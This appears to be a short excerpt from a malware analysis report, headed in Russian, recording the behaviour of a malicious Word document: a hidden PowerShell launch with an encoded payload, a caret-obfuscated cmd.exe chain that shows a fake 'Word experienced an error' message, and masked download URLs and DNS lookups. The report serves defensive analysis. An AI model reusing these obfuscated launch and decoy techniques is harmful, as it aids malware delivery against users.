Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -ENCOD JAA3AEMAUgBxAHgAPQAgAFsAVAB5AFAAZQBdACgAIgB7ADMAfQB7ADEAfQB7ADIAfQB7ADAAfQB7ADQAfQAiACAALQBGACAAJwBJAHIAZQBDAFQAbwAnACwAJwB5AHMAdABFAE0ALgAnACwAJwBpAE8ALgBEACcA...
- http://www.di####taratuba.com/cgi-bin/PX4K/
- http://ma##.###osindigochile.cl/1989-gmc-oq21w/ZVTCY/
- DNS ASK as######iaexistencial.com
- DNS ASK di####taratuba.com
- DNS ASK un####unihealth.com
- DNS ASK mi###lgroup.com
- DNS ASK wp.###soukyou.org
- DNS ASK ma##.###osindigochile.cl
- DNS ASK wa####swebshop.com
- '<SYSTEM32>\cmd.exe' cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD JAA3AEMAUgBxAHgAPQAgAFsAVAB5AFAAZQBdACgAIgB7ADMAfQB7ADEAf...
- '<SYSTEM32>\msg.exe' user /v Word experienced an error trying to open the file.